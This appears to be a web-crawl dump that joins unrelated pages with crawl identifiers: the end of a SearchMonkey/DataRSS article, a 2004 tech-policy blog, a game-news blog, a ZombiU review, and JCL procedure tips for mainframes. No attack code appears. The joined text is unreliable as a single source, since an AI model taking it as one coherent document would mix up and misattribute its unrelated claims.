Creating a presentation application follows a similar wizard-like dialogue. The developer provides the application’s name and some other basic information, then selects the trigger pattern and test URLs. Next, SearchMonkey shows the schema of the data available for those URLs taking into account all sources (embedded metadata, XSLT, Web Services, feeds). The developer can select the required elements which again helps to narrow down when the application should be triggered: if a required piece of the data is not available for a particular page, the application will not be executed. Then as the main step of the process, the developer builds a PHP function that returns the values to be plugged into the presentation template. As with stylesheets, the results of the application are shown in a preview window that is updated whenever the developer saves the application. In practice, most PHP applications simply select some data to display or contain only simple manipulations of the data. The last step is again the sharing of the application.
Figure 4: Online application development tool (a larger version of the image is also available)
As the description shows, the representation of data is a crucial aspect of SearchMonkey, since the output is simply a result of executing a set of transformations on Web data. Some of these transformations are performed using XSLT and some are complex enough to require a full-blown programming language such as PHP. What connects these pieces is a canonical representation of structured data.
To understand better the choices made in dealing with structured data it is useful to summarize the main requirements that any solution must fulfill. These are as follows:
An application platform based on structured data. As described above, the starting point of SearchMonkey was the observation that the (vast) majority of Web pages on the Web are generated from some sort of a database, in other words driven by structured data. Publishers are increasingly realizing the benefits of opening up both data and services in order to allow others to create mash-ups, widgets or other small, non-commercial applications using their content. (And in turn, developers are demanding more and more the possibility to have access to data.) The preferred method of opening up data is either to provide a custom API or embed semantic markup in HTML pages using microformats. Thus SearchMonkey requires a data representation (syntax) that could generally capture structured data and a schema language that provides a minimally required set of primitives such as classes, attributes and a system of data types. The syntax and semantics should allow to capture the full content in typical microformat data and the languages used should be open to extensions as much as possible.
Web-wide application interoperability. The queries received by a search engine and the content returned as a result cover practically all domains of human interest. While it would have been easier to develop, a solution that would limit the domains of application would not meet the need of a global search product as it would not able to capture the long tail of query and content production. The question of interoperability is complicated by the fact that the application may be developed by someone other than the publisher of the data. On the one hand, this means that data needs to be prepared for serendipitous reuse, i.e. a developer should be able to understand the meaning of the data (semantics) by consulting its description (minimally, a human readable documentation of the schema). On the other hand, the framework should support building applications that can deal with data they can only partially understand (for example, because it mixes data from different schemas). Changes in the underlying representation of the data also need to be tolerated as much as possible.
Ease of use. It has been often noted that the hallmark of a successful Semantic Web application is that no user can tell that it was built using semantic technologies. That novel technology should take a backstage role was also a major requirement for SearchMonkey: the development environment is targeted at the large numbers of Web developers who are familiar with PHP and XML technologies (at least to the extent that they can understand an example application and start extending or modifying it to fit their needs). However, developers could not have been expected to know about RDF or RDFa, technologies that still ended up playing a role in the design of the system.
Key benefits of semantic technology
Semantic technologies promise a more flexible representation than XML-based technologies. Data doesn’t need to conform to a tree structure, but can follow an arbitrary graph shape. As the unit of information is triple, and not an entire document, applications can safely ignore parts of the data at a very fine-grained, triple by triple level. Merging RDF data is equally easy: data is simply merged by taking the union of the set of triples. As RDF schemas are described in RDF, this also applies to merging schema information. (Obviously true merging requires mapping equivalent classes and instances, but that is not a concern in the current system.) Semantics (vocabularies) are also completely decoupled from syntax. On the one hand, this means that RDF doesn’t prescribe a particular syntax and in fact triples can be serialized in multiple formats, including the XML based RDF/XML format. (An XML-based format was required as only XML can serve as input of XML transformations.) On the other hand, it also means that the resources described may be instances of multiple classes from possibly different vocabularies simply by virtue of using the properties in combination to describe the item. The definition of the schema can be simply retrieved by entering URIs into a web browser. RDF-based representations are also a good match for some of the input data of the system: eRDF and RDFa map directly to RDF triples. Microformats can also be re-represented in RDF by using some of the pre-existing RDF/OWL vocabularies for popular microformats.
Given the requirements, the benefits and drawbacks of these options and the trends of developments in the Web space, the choice was made to adopt RDF-based technologies. However, it was also immediately clear that RDF/XML is not an appealing form of representing RDF data. In particular, it does not allow to capture metadata about sets of triples such as the time and provenance of data, both of which play an important role in SearchMonkey. Other RDF serialization formats have been excluded on the same basis or because they are not XML-based and only XML-based formats can be input to XSL transformations.
These considerations led to the development of DataRSS, an extension of Atom for carrying structure data as part of feeds. A standard based on Atom immediately opens up the option of submitting metadata as a feed. Atom is an XML-based format which can be both input and output of XML transformation. The extension provides the data itself as well as metadata such as which application generated the data and when was it last updated. The metadata is described using only three elements: item, meta, and type. Items represent resources, metas represent literal-valued properties of resources and types provide the type(s) of an item. These elements use a subset of the attributes of RDFa that is sufficient to describe arbitrary RDF graphs (resource, rel, property, typeof). Valid DataRSS documents are thus only valid as Atom and XML, but also conform to the RDFa syntax of RDF, which means that the triples can be extracted from the payload of the feed using any RDFa parser. Figure 5 provides an example of a DataRSS feed describing personal information using FOAF (the Friend-of-a-Friend vocabulary).
Figure 5: DataRSS feed example
A new format also brings along the question of query language. Since DataRSS is both XML and RDF, the two immediately available options were XPath and SPARQL. However, it was also immediately clear that both languages are too complex for the task at hand. Namely, presentation applications merely need to filter data by selecting a simple path through the RDF graph. Again, the choice was made to define and implement a simple new query language. (The choice is not exclusive: applications can execute XPath expressions, and the option of introducing SPARQL is also open.) As the use case is similar, this expression language is similar to a Fresnel path expressions except that expressions always begin with a type or property, and the remaining elements can only be properties. Figure 5 also gives some examples of this query language.
The current applications populating this platform are relatively modest transformations of structured data into a presentation of the summary of web pages. However, the platform is open to extensions that use structured data to enrich other parts of the search interface or to be deployed in different settings such as a mobile environment. Lastly, in building on semantic technologies SearchMonkey has not only accomplished its immediate goals but is well prepared for a future with an increasingly more semantic web where the semantics of data will drive not only presentation but the very process of matching user intent with the Web’s vast sources of structured knowledge.
SearchMonkey
Peter Mika. Anatomy of a SearchMonkey. Nodalities Magazine, September/October 2008.
Peter Mika. Talking with Talis (podcast).
Last modified $Date: 2009/05/02 09:48:17 $ by $Author: ivan $
© Copyright 2008, Yahoo! | 计算机 |
2015-48/3683/en_head.json.gz/398 | January 24, 2004 Remember Microsoft’s "Embrace" of XML? [7:34 pm] Microsoft seeks XML-related patents
The company filed patent applications in New Zealand and the European Union that cover word processing documents stored in the XML (Extensible Markup Language) format. The proposed patent would cover methods for an application other than the original word processor to access data in the document. The U.S. Patent Office had no record of a similar application.
[...] Despite those moves toward openness, the patents could create a barrier to competing software, said Rob Helm, an analyst for research firm Directions on Microsoft.
“This is a direct challenge to software vendors who want to interoperate with Word through XML,” he said. “For example, if Corel wanted to improve WordPerfect’s support of Word by adopting its XML format…for import/export, they’d probably have to license this patent.”
The patents likely wouldn’t immediately affect the open-source software package OpenOffice, which uses different XML techniques to describe a document, Helm said. But they could prevent future versions of OpenOffice and StarOffice, its proprietary sibling, from working with Microsoft’s XML format. permalink to just this entry
From Tomorrow’s NYTimes Magazine Section [5:25 pm] The Tyranny of Copyright? — with quotes and comments from the entire ILaw group — Lessig, Zittrain, Benkler, Nesson and Fisher. (I note that I come late to this — see Donna’s links from yesterday below.)
The future of the Copy Left’s efforts is still an open question. James Boyle has likened the movement’s efforts to establish a cultural commons to those of the environmental movement in its infancy. Like Rachel Carson in the years before Earth Day, the Copy Left today is trying to raise awareness of the intellectual ”land” to which they believe we ought to feel entitled and to propose policies and laws that will preserve it. Just as the idea of environmentalism became viable in the wake of the last century’s advances in industrial production, the growth of this century’s information technologies, Boyle argues, will force the country to address the erosion of the cultural commons. ”The environmentalists helped us to see the world differently,” he writes, ”to see that there was such a thing as ‘the environment’ rather than just my pond, your forest, his canal. We need to do the same thing in the information environment. We have to ‘invent’ the public domain before we can save it.”
One of the callouts, put into a crosshead in the dead-tree version, makes the following stab at redefining the rhetoric (Larry Lessig’s comments in the text):
“In the cultural sphere,” says one law professor, “big media wants to build a new Soviet empire where you need permission from the central party to do anything.”
Slashdot discussion: The Tyranny of Copyright?. See also Donna’s posts: The Copyfight Hits NYT Magazine and Eyes on the Prize
After yesterday, it’s good to see that these issues are getting some exposure. But, I fear that articles like this are largely preaching to the choir. It may well be that some will be informed by this article, but it’s not at all clear that the article is generating the kind of thinking required. See the forum that the NYTimes is running alongside the article. It will be interesting to see if anything emerges there that isn’t already a Slashdot diatribe. Sor far, aside from a weird slam at the author of the article (already responded to), it’s about what you might expect.
Algorithms to Defeat Currency Copying [10:52 am] As a followup to the discussion on efforts to make copying currency difficult by putting code into PhotoShop and other tools, sharp-eye reader of Slashdot comments Su finds a link to a design feature that appears to be a part of the technique in a Slashdot comment: The EURion Constellation.
Note that others cite that this same pattern appears in the new US $20s and probably other bills — something to check on the next time you get some cash from the ATM
Update: Jan 26 — Ed Felten has some more to say about this: Photoshop and Currency | 计算机 |
2015-48/3683/en_head.json.gz/1359 | Hello guest register or sign in or with: New games are coming update 01/07/12 blog - Kark-Jocke
Kark-Jocke
Joachim Dimitri joined Jul 24, 2010 summary
Hello there and welcome to my profil, is there anything I can help you with? Information about Game, Anime-Series, Movies, Normal TV-Series or something else perhaps? I also have opportunities to help with ModDB profilers backgrounds and music, if there is anything send me a PM or comment on the comment list. Report content RSS feed New games are coming update 01/07/12
Posted by Kark-Jocke on Jul 1st, 2012 New games are coming update 01/07/12 Spec Ops: The Line
Yager Development and 2K Games released this week, "Spec Ops: The Line." The game a third person shooter with a special focus on character development and action. Set to a sand coated Dubai, the game follows three elite soldiers who have the task of finding the missing Colonel Konrad. Watch the latest developer diary, as well as the launch trailer from the game below. "Spec Ops: The Line" was released this week and is available to Xbox 360, Playstation 3 and PC. Warframe
Digital Extremes released "Darkness II" a little earlier this year. It will not however say that they have been lazy. This week they revealed because his next title, called "Warframe." So far very little is known about the game, but there is no doubt that there is a potential here. See the unveiling video below. "Warframe" has no release date yet and the game is, so far only announced for PC. Planetside 2
Although this year's E3 is now a few weeks behind us, it will not however say that we have gotten us everything. Among the many missed out, we find a presentation of "Planetside 2". The presentation is a little dry, but it shares brotherly with information about the game's systems. See the presentation video below. "Planetside 2" is currently no release date. The game is only for PC. The Amazing Spider-Man
Beenox and Activision released this week, "The Amazing Spider-Man," based on this summer's upcoming blockbuster movie of the same name. The game is certainly set for the film's action and the film is a little over a week from the big screen. Some, myself included, may postpone the game until they have seen the film. While we wait, we can however check out the latest developer diary from the game, which can be seen below. "The Amazing Spider-Man" was released this week and is available to Xbox 360 and Playstation 3 There are also special versions for Wii, DS and 3DS, while a PC version is expected Aug. 10. Dead or Alive 5
"Dead or Alive" series' fast gameplay and dynamic combat, not to mention the scantily clad women, has long been a favorite among many fighting game fans. Nevertheless, there have been some years since we've seen much of the series. In other words, the time that Team Ninja and Tecmo Koei finally will release "Dead or Alive 5." This week they revealed one of the game's new characters, a tae kwon do athlete only called Rig. See the Rigs debut trailer below.
"Dead or Alive 5" has release date of September 25, 2012. The game comes to Xbox 360 and Playstation 3
The Walking Dead - Episode 2
It was probably a Sunday tapas at an end and I hope it was something that appealed to most people. This time I choose to end with the launch trailer for the second episode of Telltale Games' The Walking Dead. "The trailer can certainly be seen below. "The Walking Dead - Episode 2" was released this week and is available to Xbox 360, Playstation 3, PC and Mac. Post comment Comments
OrangeNero Jul 2 2012 says:
I was highly interested into spec ops the line. Tried the demo out and well... its a standard 3rd person shooter. It does play great and the vissuals are stunning and run smooth but I got 3rd person shooters which are 10 years old and offer the same or more gameplay.
Well I'll be getting it in a few months when its dirt cheap. A 5 hour campaign and 6 small MP maps just aren't all that exciting.
79%Project Reality54 Avatar
12hours 7mins ago Country
Norway Gender
Start tracking Blog
Blogs New | 计算机 |
2015-48/3683/en_head.json.gz/2595 | ZombiU was supposed to be a flagship title for the console, displaying it's graphical abilities and the new features of the gamepad in a manner that would make the console the "in" thing for gamers everywhere.Instead, what it became was an extremely polarizing game. There are very few people who are of the mindset that this game is "just alright". Most people you run into will find it either a brilliant video game, full of depth and difficulty, or a janky, poorly executed mess.ZombiU takes place in London in November, 2012. An old legend called the Black Prophecy is coming to pass, with a zombie outbreak. There has been an underground group researching and preparing for this day. As one of the survivors of the apocalypse, you are tasked with working with this underground group to find the cure.ZombiU doesn't set out to be your typical run-and-gun shoot-'em-up first person shooter. It, instead, wants to be a survival horror game. You can shoot all the zombies you want, great. What's more important is the goal of survival. Survive so that you can get samples. Survive so that you can help find the cure. Survive so that you can just keep living. It takes an angle on the zombie fad that a lot of games just look past.One of the more polarizing aspects of the game is it's permadeth. In ZombiU, when your character dies, you don't play as that character anymore. Instead, you respawn as another one of the survivors. Your old character, in keeping with the elements of the game, doesn't just disappear- it becomes a zombie. You have to kill your old self to get your items back, which is a surreal experience. You have just spent three hours or so as character A, and now you are character B, and your first mission? Smash in Zombie Character A's brains. The weakness to this system is that there is only one dead copy at a time, so if you die again before you can retrieve your loot, it's all gone. Another polarizing aspect is the combat. It tries to do so well. You are always armed with a melee weapon, a cricket bat. Along the way, you can pick up other weapons, including, of course, guns. The problem with guns is that they make noise. The noise attracts other zombies to come see what all the fuss is about, which turns your group of three zombies that you got the drop on into five or six guys trying to eat your brains. Add in that kickback causes problems for you (which, if you're thinking about yourself as a survivor in England who might not have the most experience shooting a gun, adds a level to this game that isn't always thought about) and that ammo is very, very scarce, and you have all the elements for a great survival horror game. However, the problem is that the melee with the cricket bat is unrewarding. It can take five or six hits at times to down a zombie. Finding a group of three or four means fifteen to twenty hits, and that's a chore. The use of the WiiU gamepad is a fun part of this game. When you go to loot things, rather than a menu coming up and the game pausing, you are directed to look at the gamepad's screen. There, you can see what is in the filing cabinet and decide what you want to keep. While that is happening, though, the game isn't paused. Everything is still going on around you. It adds an element of tension to your adventures that is not found in many other games.This game tries to be one of the best zombie games out there. It tries to take a fresh approach to things. It has all of the right ideas, too. Rather than an amazing story or just being a game about killing a million zombies, it really nails the feeling that you are trying to survive so, so well. Unfortunately, it misses in execution of parts. I really hope we see a sequel to this with more polished combat, or at least another game trying to do the same things here. This game is the epitome of having great ideas, but not quite executing them in the right way. It's an enjoyable and unique experience for sure if you're willing to forgive it of it's faults, but that is a bridge too far for some people. Terms & Conditions | 计算机 |
2015-48/3683/en_head.json.gz/2608 | SearchEnterpriseLinux
IBM system z and mainframe systems
Data center servers
Linux servers
Microsoft Windows Server in the data center
Data center ops
Data center disaster recovery
Data center jobs, professional development
Compliane and governance
Data center facilities
Networks and storage
Converged infrastructure (CI)
Enterprise data storage strategies
Networking hardware
Data center networks
Storage hardware in the data center
Data center systems management
Data center hosting
Data center automation
Data center capacity planning
Configuration and DevOps
Emerging IT workload types
Data center backup power and power distribution
Data center cooling
Data center design and construction
Data center energy efficiency
Data center hosted services
Data Center Issues in the Channel
Data center physical security and fire suppression
Data center systems concerns for value-added resellers (VARs)
iSeries - data center
IT Compliance: SOX and HIPAA in the data center
IT Governance: ITIL, ITSM, COBIT
Mainframe jobs
Mainframe Linux, IBM System z
Mainframe migration projects
Mainframe operating systems and management
Mainframe security and disaster recovery
Managing data center outsourcing services, vendors
Network cabling
Network management strategies for the data center
Server hardware packaging, recycling, e-waste
Server management for Windows administrators
Server virtualization tips and trends
Storage management in the data center
Systems management for virtual servers
Unix servers
JCL procedure tips
If you write your own JCL, these input and output tips will make coding and calling procedures a little easier.
Bonita BPM
CA Gen
Basis challenge #2: Gathering SQL Server information
– SearchSAP
Override a SYSIN DD DSN in the proc from the JCL?
Data driven occurs and the control file
– SearchOracle
Big Data Workloads in the Cloud
Avoid Downtime and Security Issues With These 5 Data Protection Best Practices
Improve Your Automated Decisions with Business Rules & Events
BMC Software Hybrid Copy Techniques
–BMC Software, Inc.
By Robert Little
By submitting my Email address I confirm that I have read and accepted the Terms of Use and Declaration of Consent. By submitting your email address, you agree to receive emails regarding relevant topic offers from TechTarget and its partners. You can withdraw your consent at any time. Contact TechTarget at 275 Grove Street, Newton, MA. You also agree that your personal information may be transferred and processed in the United States, and that you have read and agree to the Terms of Use and the Privacy Policy. To those of you who still code your own JCL and - shudder - put the JCL into procedures for your own or others' use, here are a couple of tips that might make coding and calling procedures a little easier.
Did you ever have a situation in which you created a procedure containing two different parameters that had the same value about 90% of the time but different values the other 10%? So, whenever you called the procedure, you had to pass the same two values into the two parameters most of the time. Wouldn't it be nice to pass one parameter most of the time and only pass two parameters when you needed to? Here is a simple tip that allows you do to this. The Compress Procedure Example (listed below) takes an input data set and terses (compresses) it using an IBM-supplied utility. The output from this procedure is a compressed data set. The input data set is not changed. The procedure can be passed either one parameter (the input data set name) or two parameters (the input data set name and the output data set name). If passed one parameter, the procedure uses the input data set name to build the output data set name. The output data set name is the input data set name with the node ".TERSED" appended to the end. This is how the procedure would be called most of the time (the 90% case).
However, there are some cases where you would not be able to do this (the 10% case). For example, if the input data set name was more than 37 characters long, appending ".TERSED" to it would result in a data set name that contained too many characters, and a JCL error. In this case, we would need to pass two parameters to the procedure: the input data set name and the output data set name. The procedure would take the output data set name and append ".TERSED" to it, so the output data set name must contain fewer than 38 characters. The trick here is to use the input data set name parameter as a default value for the output data set name in the procedure header definition. Then when the procedure gets expanded, if no output data set name is passed to the procedure, it will use the value passed as the input data set name. Did you ever have a situation where you needed to execute a TSO command against a data set within JCL? You could call program IKJEFT01 (the TSO command processor) within the JCL and hard-code the TSO command inline after the SYSIN DD statement. But what if you wanted to code this step within a procedure and pass the name of the data set within a procedure parameter? You cannot have inline control statements within your procedure. And even if you could, you could not specify a procedure parameter within the statements because no substitution would be performed. You can call program IKJEFT01 within your JCL and code the command to be executed within the PARM field. This field can contain procedure parameters and substitution of the parameters will be performed. After the substitution has been done, the resulting string is passed to the TSO command processor and executed. The TSO Command Procedure Example (listed below) shows how to rename a data set within a procedure step. There are many other not so obvious ways to do things within procedures. I would suggest that, if you think there ought to be a way to do something, there probably is. It just requires a little bit of imagination and a lot of trial and error to find it.
Code: COMPRESS PROCEDURE EXAMPLE //JOBCARD //* //********************************************************************* //* * //* TERSE (COMPRESS) THE DATA SET ALLOCATED TO DDNAME "INFILE" * //* INTO THE DATA SET NAME ALLOCATED TO DDNAME "OUTFILE". * //* * //********************************************************************* //* //TERSE PROC INFILE=DEFAULT, // OUTFILE=&INFILE //* //TERSE EXEC PGM=TRSMAIN,PARM='PACK' //* //STEPLIB DD DISP=SHR,DSN=SYS1.LOADLIB LIBRARY CONTAINING TRSMAIN //* //SYSPRINT DD SYSOUT=* //* //INFILE DD DISP=SHR, // DSN=&INFILE //* //OUTFILE DD DISP=(NEW,CATLG,DELETE), // LRECL=1024,DSORG=PS,RECFM=FB, // UNIT=SYSDA,SPACE=(CYL,(500,100),RLSE), // MGMTCLAS=MCTSO,STORCLAS=SCBASE, // DSN=&OUTFILE..TERSED //* //* //********************************************************************* //* * //* EXECUTE JCL TO CALL PROCEDURE TERSE WITH ONE PARAMETER. * //* * //********************************************************************* //* //LIST01 EXEC TERSE,INFILE='USERID.PM12345.LIST01' //* //* //********************************************************************* //* * //* EXECUTE JCL TO CALL PROCEDURE TERSE WITH TWO PARAMETERS. * //* * //********************************************************************* //* //*SVCDMP01 EXEC TERSE, //* INFILE='MVS.DUMP.E.JOBNAME.D020804.T020646.S00031', //* OUTFILE='USERID.PM12345.SVCDMP01' TSO COMMAND PROCEDURE EXAMPLE //JOBCARD //* //********************************************************************* //* * //* PROCEDURE TO RENAME A DATA SET. * //* * //********************************************************************* //* //RENAME PROC OLDFILE=, // NEWFILE= //* //* //RENAME EXEC PGM=IKJEFT01, // PARM='RENAME ''&OLDFILE'' ''&NEWFILE''' //* //SYSPRINT DD SYSOUT=* //* //SYSTSPRT DD SYSOUT=* //* //SYSTSIN DD DUMMY //* //* //RENAME PEND //* //* //********************************************************************* //* * //* EXECUTE JCL TO CALL PROCEDURE RENAME. * //* * //********************************************************************* //* //RENAME EXEC RENAME,OLDFILE='USERID.OLD.FILE', // NEWFILE='USERID.NEW.FILE'
Comments? Questions? Email us at SearchDataCenter.com or email Robert Little.
Dig Deeper on IBM system z and mainframe systems
What can I do to gain Java skills and leave mainframe programming?
IBM delivers Linux mainframes to the open source world
Learn mainframe SIMD instructions for the IBM z13's processor
IBM Watson looks to AlchemyAPI to boost its appeal
New tools could draw Millennials to IBM mainframes
Five COBOL interview questions to land a new job
Can I configure DB2 replication from the mainframe to AIX?
Address common problems in mainframe testing concepts
Does a mainframe cloud exist, and is it practical?
IBM z/OS Connect boosts mainframe communication with apps
Make the mainframe system part of your business continuity process
Can an Oracle database update from mainframe jobs?
IBM mainframe pricing gets a mobile discount
How do I transfer a PS file from a mainframe to a Linux server?
Four benefits of agile DevOps on the mainframe
The merits of white box switching
Collaboration moves beyond email
Data center infrastructure that supports big data
Windows Server Enterprise Linux Server Virtualization Cloud Computing SearchWindowsServer
SUSE Linux jumps on the open private cloud deployment train
SUSE Linux Enterprise planning private cloud deployment with OpenStack weight behind it. NVIDIA works on Linux drivers for ...
Want one of the many Linux jobs out there? Time to go back to class
Does extended education from the Linux Foundation and others help graduates meet the demands of today’s Linux jobs? Some say yes.
Ubuntu ARM server AMI for Amazon EC2 offers fast access in the cloud
Canonical’s Ubuntu ARM server AMI for Amazon EC2 provide open source shops with a fast ARM server for the cloud. | 计算机 |